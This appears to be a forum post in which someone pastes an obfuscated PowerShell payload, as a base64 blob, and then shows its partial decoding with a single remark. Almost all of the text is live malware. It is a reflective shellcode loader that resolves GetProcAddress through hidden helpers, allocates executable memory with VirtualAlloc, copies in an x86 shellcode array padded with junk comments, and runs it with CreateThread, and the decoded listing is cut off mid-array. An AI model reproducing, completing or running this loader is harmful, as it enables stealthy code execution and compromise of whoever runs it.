UsMHg4NiwweDAwLDB4MDAsMHgwMCwweDhELDB4ODUsMHg2MCwweEZGLDwjb3ojPjB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweDhELDB4ODUsMHg2QywweEZGLDB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweDhCLDB4ODUsMHg3QywweEZGLDB4RkYsMHhGRiwweDgzLDB4QzAsMHg0MSwweDUwLDB4OEIsMHg4NSwweDcwLDB4RkYsMHhGRiwweEZGLDB4NTAsMHhGRiwweDU1LDB4QUMsMHg4NSwweEMwLDB4NzUsMHg1QywweDgzLDB4QkQsMHg2MCwweEZGLDB4RkYsPCN4ZGUjPjB4RkYsMHg2NCwweDc2LDB4NTMsMHg2QSwweDQwLDB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCwweDhCLDB4ODUsMHg2MCwweEZGLDB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweEZGLDB4NTUsMHhBOCwweDg5LDB4ODUsMHg2NCwweEZGLDB4RkYsMHhGRiwweDgzLDB4QkQsMHg2NCwweEZGLDB4RkYsPCNjaHEjPjB4RkYsMHgwMCwweDc0LDB4MzEsMHg4RCwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDhCLDB4ODUsPCNidSM+MHg2NCwweEZGLDB4RkYsMHhGRiwweDUwLDB4OEQsMHg4NSwweDZDLDwja2YjPjB4RkYsPCN5YWMjPjB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweDhCLDB4ODUsMHg3QywweEZGLDB4RkYsPCN5bCM+MHhGRiwweDgzLDB4QzAsMHg0MSwweDUwLDB4OEIsMHg4NSwweDcwLDwjbXgjPjB4RkYsMHhGRiwweEZGLDB4NTAsMHhGRiwweDU1LDB4QUMsMHg4NSwweEMwLDB4NzUsMHgwMiwweEIzLDB4MDEsMHgzMywweEMwLDB4ODksMHg4NSw8I2huIz4weDcwLDB4RkYsMHhGRiwweEZGLDB4ODQsMHhEQiwweDBGLDwjZHMjPjB4ODUsMHhCOCwweDAwLDB4MDAsMHgwMCwweDMzLDB4QzAsMHg4OSwweDg1LDwjdXUjPjB4NjQsMHhGRiwweEZGLDB4RkYsPCN4byM+MHgzMywweEMwLDB4ODksMHg4NSw8I21uZiM+MHg2MCwweEZGLDB4RkYsMHhGRiwweDhELDB4ODUsMHg3MCwweEZGLDB4RkYsMHhGRiw8I2dkZyM+MHg1MCwweDZBLDB4MDEsMHg2QSwweDAwLDB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4NTAsMHg2OCwweDAxLDB4MDAsMHgwMCwweDgwLDB4RkYsMHg1NSwweEIwLDB4ODUsMHhDMCwweDBGLDB4ODUsMHg4NiwweDAwLDB4MDAsMHgwMCw8I2d3cSM+MHg4RCwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHg4RCwweDg1LDB4NkMsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHg4MywweEMwLDB4NDEsMHg1MCwweDhCLDB4ODUsMHg3MCwweEZGLDB4RkYsMHhGRiwweDUwLDB4RkYsPCNucmwjPjB4NTUsMHhBQywweDg1LDwjYXMjPjB4QzAsMHg3NSwweDVDLDB4ODMsMHhCRCwweDYwLDB4RkYsMHhGRiwweEZGLDB4NjQsMHg3NiwweDUzLDB4NkEsMHg0MCwweDY4LDB4MDAsMHgzMCwweDAwLDB4MDAsMHg4QiwweDg1LDB4NjAsPCNxciM+MHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHhGRiwweDU1LDB4QTgsMHg4OSwweDg1LDwjZnpxIz4weDY0LDB4RkYsMHhGRiwweEZGLDB4ODMsMHhCRCwweDY0LDB4RkYsMHhGRiwweEZGLDB4MDAsMHg3NCwweDMxLDB4OEQsMHg4NSwweDYwLDB4RkYsMHhGRiwweEZGLDwjbnB1Iz4weDUwLDB4OEIsMHg4NSwweDY0LDB4RkYsMHhGRiwweEZGLDB4NTAsMHg4RCwweDg1LDB4NkMsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHg4MywweEMwLDB4NDEsMHg1MCwweDhCLDwjZXBwIz4weDg1LDwjcmMjPjB4NzAsMHhGRiwweEZGLDB4RkYsPCNwb2kjPjB4NTAsPCN0ZyM+MHhGRiwweDU1LDB4QUMsPCNzdHQjPjB4ODUsMHhDMCw8I2t3Iz4weDc1LDB4MDIsMHhCMywweDAxLDB4ODQsMHhEQiw8I3NheCM+MHg3NSwweDA1LDwjb21wIz4weDZBLDB4MDAsMHhGRiwweDU1LDB4QTQsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHg4QiwweDgwLDwjdHhkIz4weERDLDB4MDAsMHgwMCwweDAwLDB4NTAsMHg4QiwweDg1LDwjYXJnIz4weDdDLDB4RkYsMHhGRiwweEZGLDB4ODMsMHhDMCwweDUyLDB4NTAsMHg4RCwweDg1LDB4MDAsMHhGQSwweEZGLDB4RkYsMHg1MCw8I2NwcCM+MHhGRiwweDk1LDB4NzgsMHhGRiwweEZGLDB4RkYsMHgzMywweEY2LDB4OEQsMHg4RCwweDAwLDB4RkIsMHhGRiwweEZGLDB4ODksMHgzMSwweDQ2LDB4ODMsMHhDMSwweDA0LDB4ODEsMHhGRSwweDAwLDB4MDEsMHgwMCwweDAwLDB4NzUsMHhGMiwweDMzLDB4REIsMHgzMywweEY2LDB4OEQsMHg4RCwweDAwLDB4RkIsMHhGRiwweEZGLDwjYXhqIz4weDAzLDB4MTksPCN2cW0jPjB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4RkYsMHhCMCwweERDLDB4MDAsMHgwMCwweDAwLDB4OEIsMHhDNiw8I3dydiM+MHg1QSwweDhCLDB4RkEsMHgzMywweEQyLDB4RjcsMHhGNywweDMzLDB4QzAsMHg4QSwweDg0LDB4MTUsMHgwMCwweEZBLDB4RkYsMHhGRiwweDAzLDB4RDgsMHg4MSwweEUzLDB4RkYsMHgwMCwweDAwLDB4MDAsMHg4QSwweDAxLDwjb25uIz4weDhCLDB4OTQsMHg5RCwweDAwLDB4RkIsMHhGRiwweEZGLDB4ODksMHgxMSwweDI1LDB4RkYsMHgwMCwweDAwLDB4MDAsMHg4OSwweDg0LDB4OUQsMHgwMCwweEZCLDB4RkYsMHhGRiwweDQ2LDB4ODMsMHhDMSw8I3pxIz4weDA0LDB4ODEsMHhGRSwweDAwLDB4MDEsMHgwMCwweDAwLDB4NzUsMHhCNSw8I3pqYiM+MHgzMywweERCLDB4MzMsMHhGRiw8I3hncCM+MHg2QSwweDQwLDB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCwweDhCLDwjZG4jPjB4ODUsPCNvbyM+MHg2MCwweEZGLDB4RkYsMHhGRiwweDUwLDB4NkEsPCNienEjPjB4MDAsMHhGRiw8I2F0byM+MHg1NSw8I3R1Iz4weEE4LDB4ODksMHg4NSwweDVDLDB4RkYsMHhGRiwweEZGLDB4ODMsMHhCRCwweDVDLDB4RkYsPCNrayM+MHhGRiwweEZGLDB4MDAsMHg3NCwweDI5LDB4OEIsMHg4NSw8I3lucCM+MHg1QywweEZGLDB4RkYsMHhGRiwweDg5LDB4ODUsPCN0dHAjPjB4NEMsMHhGRiwweEZGLDB4RkYsMHg4QiwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDhCLDB4ODUsMHg2NCwweEZGLDB4RkYsMHhGRiwweDUwLDB4OEIsMHg4NSw8I2JiayM+MHg0QywweEZGLDB4RkYsMHhGRiwweDUwLDB4RkYsMHg5NSwweDc4LDB4RkYsMHhGRiwweEZGLDB4RUIsMHgwNSwweDZBLDB4MDAsMHhGRiwweDU1LDB4QTQsMHg4QiwweDg1LDB4NjAsMHhGRiw8I2RkdiM+MHhGRiwweEZGLDB4NDgsMHg4NSwweEMwLDB4NzIsMHg3NCwweDQwLDB4ODksMHg4NSwweDNDLDB4RkYsMHhGRiwweEZGLDB4MzMsMHhGNiwweDQzLDB4ODEsMHhFMywweEZGLDB4MDAsMHgwMCwweDAwLDB4MDMsMHhCQywweDlELDB4MDAsMHhGQiwweEZGLDB4RkYsMHg4MSwweEU3LDB4RkYsMHgwMCwweDAwLDB4MDAsMHg4QSwweDg0LDB4OUQsMHgwMCwweEZCLDB4RkYsMHhGRiwweDhCLDB4OTQsMHhCRCwweDAwLDB4RkIsMHhGRiw8I3VwbiM+MHhGRiwweDg5LDB4OTQsMHg5RCwweDAwLDB4RkIsMHhGRiwweEZGLDB4MjUsPCN4cmYjPjB4RkYsMHgwMCwweDAwLDB4MDAsMHg4OSwweDg0LDB4QkQsMHgwMCwweEZCLDB4RkYsMHhGRiwweDhCLDB4ODUsMHg0QywweEZGLDB4RkYsMHhGRiwweDhBLDB4MDQsMHgzMCwweDhCLDB4OTQsMHg5RCwweDAwLDwjY3JmIz4weEZCLDB4RkYsMHhGRiwweDAzLDB4OTQsMHhCRCwweDAwLDB4RkIsMHhGRiwweEZGLDB4ODEsMHhFMiwweEZGLDB4MDAsMHgwMCwweDAwLDwjb2EjPjB4MzIsMHg4NCwweDk1LDB4MDAsMHhGQiwweEZGLDB4RkYsMHg4QiwweDk1LDB4NEMsMHhGRiwweEZGLDB4RkYsMHg4OCwweDA0LDB4MzIsMHg0Niw8I3N1dSM+MHhGRiwweDhELDB4M0MsMHhGRiwweEZGLDB4RkYsMHg3NSwweDk1LDB4OEIsMHg4NSw8I3R4Iz4weDRDLDB4RkYsMHhGRiwweEZGLDB4ODksMHg0NSwweEQ0LDB4OEIsMHg0NSwweEQ0LDB4NjYsMHg4MSwweDM4LDB4NEQsMHg1QSwweDBGLDB4ODUsMHhEQSwweDAyLDB4MDAsMHgwMCwweDhCLDB4NDUsPCN5biM+MHhENCwweDhCLDB4NDAsMHgzQywweDAzLDB4ODUsMHg0QywweEZGLDB4RkYsMHhGRiwweDg5LDB4NDUsMHhEMCwweDhCLDB4NDUsMHhEMCwweDgxLDB4MzgsMHg1MCwweDQ1LDB4MDAsMHgwMCwweDBGLDB4ODUsMHhCQyw8I3Z5Iz4weDAyLDB4MDAsMHgwMCwweDhCLDB4NDUsMHhEMCwweDhCLDB4NTgsMHg1MCwweDAzLDB4REIsMHg2QSwweDQwLDwjbHYjPjB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCw8I2RsZiM+MHg1Myw8I2ZydSM+MHg2QSw8I2FyIz4weDAwLDB4RkYsMHg1NSwweEE4LDB4ODksMHg0NSwweEY4LDB4ODMsMHg3RCwweEY4LDB4MDAsMHgwRiwweDg0LDB4OUEsMHgwMiwweDAwLDB4MDAsMHg4QiwweDQ1LDB4RDAsMHg4QiwweDQwLDB4NTQsMHg1MCwweDhCLDwjc3AjPjB4ODUsPCNsdGIjPjB4NEMsMHhGRiwweEZGLDB4RkYsMHg1MCwweDhCLDB4NDUsMHhGOCw8I2xmbCM+MHg1MCwweEZGLDB4OTUsMHg3OCwweEZGLDB4RkYsMHhGRiwweDZBLDB4MDQsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHgwNSwweEUwLDB4MDAsMHgwMCwweDAwLDB4NTAsMHg4QiwweDQ1LDB4RDAsMHg4QiwweDQwLDB4NTAsMHgwMywweDQ1LDB4RjgsMHg1MCwweEZGLDB4OTUsMHg3OCwweEZGLDB4RkYsMHhGRiwweDhCLDB4ODUsMHg3QywweEZGLDB4RkYsMHhGRiwweDhCLDB4ODAsMHhFMCwweDAwLDB4MDAsMHgwMCwweDUwLDB4OEIsMHg4NSwweDRDLDB4RkYsMHhGRiw8I3JwbyM+MHhGRiwweDUwLDB4OEIsMHg0NSwweEQwLDB4OEIsMHg0MCwweDUwLDB4MDMsMHg0NSwweEY4LDB4ODMsMHhDMCwweDA0LDB4NTAsMHhGRiwweDk1LDB4NzgsMHhGRiwweEZGLDB4RkYsMHg2QSwweDYwLDB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4ODMsMHhDMCwweDdBLDB4NTAsMHg4QiwweDQ1LDB4RDAsMHg4Qiw8I2ltbSM+MHg0MCwweDUwLDB4MDMsMHg0NSwweEY4LDB4ODMsMHhDMCwweDA0LDB4OEIsPCN3Zm0jPjB4OTUsMHg3QywweEZGLDB4RkYsMHhGRiwweDAzLDB4ODIsMHhFMCwweDAwLDB4MDAsMHgwMCwweDUwLDwjcGojPjB4RkYsMHg5NSwweDc4LDB4RkYsMHhGRiwweEZGLDB4OEIsMHg0NSwweEQwLDB4MEYsMHhCNywweDQwLDB4MDYsMHg0OCwweDg1LDB4QzAsMHg3QywweDVGLDB4NDAsMHg4OSw8I25vdCM+MHg4NSwweDNDLDB4RkYsMHhGRiwweEZGLDB4MzMsMHhGNiw8I3F2Iz4weDhCLDB4NTUsMHhENCwweDhCLDB4NTIsMHgzQywweDhCLDB4ODUsMHg0QywweEZGLDB4RkYsMHhGRiwweDAzLDB4RDAsMHg4MSwweEMyLDB4RjgsPCN5eGcjPjB4MDAsMHgwMCwweDAwLDB4OEIsMHhDRSwweEMxLDB4RTEsMHgwMywweDhELDwjeGUjPjB4MEMsMHg4OSwweDAzLDwjdnptIz4weEQxLDB4ODksMHg5NSwweDUwLDB4RkYsMHhGRiw8I2hraSM+MHhGRiwweDhCLDB4OTUsMHg1MCwweEZGLDB4RkYsMHhGRiwweDhCLDB4NTIsMHgxMCwweDUyLDB4OEIsMHg5NSwweDUwLDB4RkYsMHhGRiwweEZGLDB4OEIsMHg1MiwweDE0LDB4MDMsMHhEMCwweDUyLDB4OEIsMHg4NSwweDUwLDB4RkYsMHhGRiwweEZGLDB4OEIsPCNnayM+MHg0MCwweDBDLDB4MDMsMHg0NSwweEY4LDB4NTAsMHhGRiwweDk1LDB4NzgsMHhGRiw8I3pjaSM+MHhGRiwweEZGLDB4NDYsMHhGRiwweDhELDB4M0MsMHhGRiwweEZGLDB4RkYsMHg3NSwweEFBLDB4OEIsMHg0NSwweEQwLDB4OEIsMHg0MCw8I3JpIz4weDM0LDwjc3NmIz4weDNCLDB4NDUsMHhGOCwweDBGLDB4ODQsPCN2bSM+MHhDQiwweDAwLDwjbnMjPjB4MDAsMHgwMCwweDhCLDwjcXZtIz4weDQ1LDB4RDAsMHg4QiwweDU1LDB4RjgsMHgyQiwweDUwLDB4MzQsMHg4OSwweDU1LDB4RDgsMHg4QiwweDQ1LDB4RjgsMHg4OSwweDQ1LDB4RjAsMHg4QiwweDQ1LDB4RDAsMHg4MywweEI4LDB4QTQsPCNvZiM+MHgwMCwweDAwLDwjeWsjPjB4MDAsMHgwMCwweDBGLDB4ODYsMHg4NywweDAwLDB4MDAsPCN2YSM+MHgwMCwweDhCLDB4NDUsMHhEMCwweDhCLDB4ODAsMHhBMCw8I214Iz4weDAwLDB4MDAsMHgwMCwweDAzLDB4NDUsMHhGMCwweDg5LDwjbGt1Iz4weDQ1LDB4RUMsMHhFQiwweDZFLDB4OEIsMHg0NSwweEVDLDB4OEIsMHgwMCwweDAzLDB4NDUsMHhGMCwweDg5LDB4NDUsMHhFOCwweDhCLDB4NDUsMHhFQywweDgzLDB4QzAsMHgwOCwweDg5LDB4NDUsPCNpdHAjPjB4RTQsPCN2ZiM+MHg4QiwweDQ1LDB4RUMsMHg4QiwweDQwLDB4MDQsMHg4MywweEU4LDB4MDgsMHhEMSwweEU4LDB4NDgsMHg4NSwweEMwLDB4NzIsMHgzRSwweDQwLDB4ODksMHg4NSwweDNDLDB4RkYsMHhGRiwweEZGLDB4OEIsMHg0NSwweEU0LDB4NjYsMHg4QiwweDEwLDB4MEYsMHhCNywweEMyLDB4QzEsMHhFOCwweDBDLDB4OEIsMHhDQSwweDY2LDwjcXYjPjB4ODEsMHhFMSwweEZGLDB4MEYsMHgwRiwweEI3LDB4QzksMHg4MywweEY4LDB4MDMsMHg3NSwweDEwLDB4OEIsMHg0NSwweEU4LDB4MDMsMHhDMSwweDg5LDB4NDUsMHhFMCwweDhCLDB4NDUsMHhFMCwweDhCLDB4NTUsMHhEOCwweDAxLDB4MTAsMHg4MywweDQ1LDB4RTQsMHgwMiwweEZGLDB4OEQsMHgzQywweEZGLDB4RkYsPCNzdyM+MHhGRiw8I3ZqIz4weDc1LDB4QzksMHg4QiwweDQ1LDB4RUMsMHg4QiwweDQwLDB4MDQsMHgwMywweDQ1LDwjaXQjPjB4RUMsMHg4OSw8I2lreCM+MHg0NSw8I2lyeCM+MHhFQywweDhCLDB4NDUsMHhFQywweDgzLDB4MzgsMHgwMCwweDc3LDB4OEEsMHg4QiwweDQ1LDB4RDAsMHg4QiwweDU1LDB4RjgsMHg4OSwweDUwLDB4MzQsMHg2OCwweEY4LDB4MDAsMHgwMCwweDAwLDB4OEIsPCN5aWEjPjB4NDUsPCNuZ2cjPjB4RDAsMHg1MCwweDhCLDB4NDUsMHhENCwweDhCLDB4NDAsMHgzQywweDAzLDB4NDUsMHhGOCwweDUwLDB4RkYsPCNsdyM+MHg5NSwweDc4LDB4RkYsMHhGRiwweEZGLDB4OEIsMHg0NSwweEQwLDB4MDUsMHg4MCwweDAwLDB4MDAsMHgwMCwweDg5LDB4NDUsPCNlZXUjPjB4OTAsMHg4QiwweDQ1LDB4OTAsMHg4MywweDc4LDB4MDQsMHgwMCwweDBGLDwjZWJ0Iz4weDg2LDB4OUUsMHgwMCw8I2NmIz4weDAwLDwjaXV1Iz4weDAwLDB4OEIsMHg0NSw8I2l1Iz4weEQwLDB4OEIsMHg4MCwweDgwLDwjc2cjPjB4MDAsMHgwMCw8I3RhdiM+MHgwMCwweDAzLDB4NDUsMHhGOCwweDg5LDB4NDUsMHg4QywweEVCLDB4N0YsMHgwMyw8I2thZSM+MHg3RCwweEY4LDB4NTcsMHhGRiwweDU1LDB4QkMsMHg4QiwweEQ4LDB4ODUsMHhEQiwweDc0LDB4NzIsMHg4QiwweDQ1LDB4OEMsMHg4MywweDM4LDB4MDAsMHg3NCwweDBELDB4OEIsMHg0NSwweDhDLDB4OEIsMHgwMCw8I2RhIz4weDAzLDB4NDUsMHhGOCwweDg5LDB4NDUsMHg4OCwweEVCLDB4MEMsMHg4QiwweDQ1LDB4OEMsMHg4QiwweDQwLDB4MTAsMHgwMywweDQ1LDB4RjgsMHg4OSwweDQ1LDB4ODgsMHg4QiwweDQ1LDB4OEMsMHg4Qiw8I2xvIz4weDQwLDB4MTAsMHgwMywweDQ1LDB4RjgsMHg4OSwweDQ1LDB4ODQsMHhFQiwweDM3LDB4OEIsMHg0NSwweDg4LDwjdXQjPjB4OEIsMHgzMCw8I2V5dCM+MHhGNywweEM2LDB4MDAsMHgwMCwweDAwLDB4ODAsMHg3NCwweDEyLDB4ODEsMHhFNiw8I3J1byM+MHhGRiwweEZGLDB4MDAsMHgwMCwweDU2LDB4NTMsMHhGRiwweDU1LDB4QjgsMHg4QiwweDU1LDB4ODQsMHg4OSwweDAyLDwjc2cjPjB4RUIsMHgxMCwweDAzLDB4NzUsMHhGOCwweDgzLDB4QzYsMHgwMiwweDU2LDB4NTMsMHhGRiwweDU1LDB4QjgsMHg4QiwweDU1LDB4ODQsMHg4OSwweDAyLDwjbmkjPjB4ODMsMHg0NSwweDg4LDwjZWIjPjB4MDQsMHg4Myw8I2ZwYSM+MHg0NSw8I3phIz4weDg0LDB4MDQsMHg4QiwweDQ1LDB4ODgsMHg4Myw8I2V6cSM+MHgzOCwweDAwLDB4NzUsMHhDMSwweDgzLDB4NDUsMHg4QywweDE0LDB4OEIsMHg0NSwweDhDLDB4OEIsMHg3OCwweDBDLDB4ODUsMHhGRiwweDBGLDB4ODUsMHg3MywweEZGLDB4RkYsMHhGRiwweDhCLDB4NDUsMHhEMCw8I2Z5dyM+MHg4QiwweDQwLDB4MjgsMHgwMywweDQ1LDB4RjgsMHg4OSwweDQ1LDB4RjQsMHgzMSwweEMwLDB4NTAsMHg2QSwweDAxLDB4RkYsMHg3NSwweEY4LDB4RkYsMHg1NSwweEY0LDwjdmFnIz4weDZBLDB4MDAsPCNob3ojPjB4RkYsMHg1NSwweEE0LDwjbXJpIz4weDVGLDB4NUUsPCNxYiM+MHg1QiwweDhCLDB4RTUsMHg1RCwweEMyLDB4MDQsPCNzaCM+MHgwMCwweDhELDB4NDAsPCNtcHgjPjB4MDAsMHg3MywweDZGLDB4NjYsMHg3NCwweDc3LDB4NjEsMHg3MiwweDY1LDB4NUMsPCN5dGwjPjB4MzcsPCN6a2YjPjB4NDcsMHg1NywweDczLDB4NjEsMHg0MSwweDY1LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDwjZ2NhIz4weDAwLDB4MDAsMHgwMCw8I3J6Iz4weDAwLDB4MDAsMHgwMCw8I25vIz4weDAwLDB4MDAsMHgwMCw8I2RmZCM+MHgwMCwweDAwLDB4MDAsMHgwMCwweDQ3LDB4NzMsMHg0NCwweDc5LDB4NzEsMHg3NCwweDU1LDB4MzYsMHg3MSwweDZFLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3Miw8I3FmciM+MHg4MiwweDk3LDB4NDYsMHhFNCwweDFCLDB4RjIsMHhBQiwweEQ5LDB4MDAsMHgwQSwweDk3LDB4ODIsMHgyNSwweDVGLDB4RTQsMHg5OSwweDVELDB4QjYsMHg4RSwweDczLDB4MjMsMHg0NiwweDdBLDB4OTIsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3MywweDAwLDB4NjgsMHgwMCwweDY1LDwjanUjPjB4MDAsMHg2QywweDAwLDB4NkMsMHgwMCwweDNDLDB4MDAsMHgzQyw8I2F3cyM+MHgwMCwweDNBLDB4MDAsMHgzQSwweDAwLDwjYmZ3Iz4weDNFLDB4MDAsMHgzRSwweDAwLDwjanAjPjB4NzMsMHgwMCwweDY4LDB4MDAsMHg2NSwweDAwLDB4NkMsMHgwMCwweDZDLDB4MDAsMHg2MiwweDAwLDwjYWQjPjB4NzAsMHgwMCwweDczLDB4MDAsMHgzQSwweDAwLDB4M0EsMHgwMCwweDYyLDB4MDAsMHg3MCwweDAwLDB4NzMsMHgwMCwweDZFLDB4MDAsMHg3NSwweDAwLDB4NkQsMHgwMCwweDNBLDB4MDAsMHgzOCwweDAwLDB4MzYsMHgwMCwweDM0LDB4MDAsPCN2eSM+MHgzQSwweDAwLDB4NkUsMHgwMCwweDc1LDwjemtnIz4weDAwLDB4NkQsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDwjd2NtIz4weDAwLDB4MDAsPCNreCM+MHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDE5LDB4MDAsMHgwMCwweDAwLDB4MDAsMHhBQSwweDA2LDB4MDAsPCNhZSM+MHg1NSwweDhCLDB4RUMsMHg2MCwweDhCLDB4N0QsMHgwOCwweDhCLDB4NzUsMHgwQywweDhCLDB4NEQsMHgxMCwweEYzLDB4QTQsMHg2MSwweDVELDB4QzIsMHgwQywweDAwLDwjYmgjPjB4RDYsMHgyNywweEQxLDB4NTgsMHgwMCwweEEwLDB4NjYsMHgzNywweDEzLDB4OTksMHg0NCwweDgyLDB4MzYsMHgwMiwweENGLDB4ODIsMHg1OCwweENBLDB4MEIsMHg3OCwweDY0LDB4QjIsMHhGNywweDk5LDB4MkQsMHg2NCwweEE3LDwjbmZ2Iz4weEFCLDB4NUYsMHgwRCwweDlCLDB4RkIsMHg0NSwweEMyLDB4MkIsMHhBQywweDMzLDwjZHhnIz4weDU1LDB4MTMsMHg4RSwweENDLDB4NjYsMHg2MywweDEyLDB4OTcsMHhFRCwweDZBLDB4RkUsMHg3RSwweDcxLDwjYXkjPjB4NUIsMHhFRCw8I2Z2Iz4weDJGLDB4QTQsMHhDNSw8I29uZyM+MHhDNywweDhFLDB4MzgsMHgyNSwweEM5LDB4OTcsMHgwNCw8I3R5Iz4weDE2LDB4QjQsMHg2NywweERELDB4RkEsMHg0MiwweDRGLDB4QkUsPCN3cCM+MHgyMCwweDAxLDB4MkQ7DQojZWJmdnhrZmZ2bA0KJHByPShbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ3Byb2Mga2VybmVsMzIuZGxsIFZpcnR1YWxBbGxvYyksKGdkZWxlZ2F0ZSBAKFtJbnRQdHJdLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdKSAoW1VJbnQzMl0pKSkpLkludm9rZSgwLCRzYzMyLkxlbmd0aCwweDMwMDAsMHg0MCk7DQojemZnZA0KaWYoJHByIC1uZSAwKXskbWVtc2V0PShbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ3Byb2MgbXN2Y3J0LmRsbCBtZW1zZXQpLChnZGVsZWdhdGUgQChbVUludDMyXSxbVUludDMyXSxbVUludDMyXSkgKFtJbnRQdHJdKSkpKTsNCiNwaGp5bnp6b3F4DQpmb3IgKCRpPTA7JGkgLWxlICgkc2MzMi5MZW5ndGgtMSk7JGkrKykgeyRtZW1zZXQuSW52b2tlKCgkcHIrJGkpLCAkc2MzMlskaV0sIDEpfTsNCiNsdnl0amoNCihbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ3Byb2Mga2VybmVsMzIuZGxsIENyZWF0ZVRocmVhZCksKGdkZWxlZ2F0ZSBAKFtJbnRQdHJdLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdLFtJbnRQdHJdKSAoW0ludFB0cl0pKSkpLkludm9rZSgwLDAsJHByLCRwciwwLDApOw0KI3BqcXR0dHpwDQp9c2xlZXAoMTIwMCk7fWNhdGNoe31leGl0Ow0KI3VzcnVjdw0KI290bGJsb2FiDQo=')))

which when you decode the base64, you get the following (which looks to be an array perhaps):

#avobmsjvucjuocxunkajuvogibdcmkeqp
sleep(15);try{
#wqdyo
function gdelegate{
#fdfffepqoo
Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
#gktfrbj
$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);
#nwbkci
$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");
#thlr
$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");
#cxywzfl
return $TypeBuilder.CreateType();}
#alkfpyijql
function gproc{
#mkleldsfcl
Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
#bpnie
$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};
#vdznigk
$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
#jutvbiw
return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}
#icebofnc
[Byte[]] $sc32 = 0x55,<#rpr#>0x8B,0xEC,<#ji#>0x81,0xC4,0x00,0xFA,0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,0x31,0xD2,0x64,0x8B,<#atw#>0x52,0x30,0x8B,0x52,<#bep#>0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,0x6A,0x18,0x59,0x31,0xFF,0x31,0xC0,<#ccd#>0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,0x01,0xC7,0xE2,0xF0,0x81,0xFF,0x5B,0xBC,0x4A,0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,<#ro#>0x5D,0xFC,<#sc#>0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x0F,<#cw#>0x02,0x00,0x00,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,<#l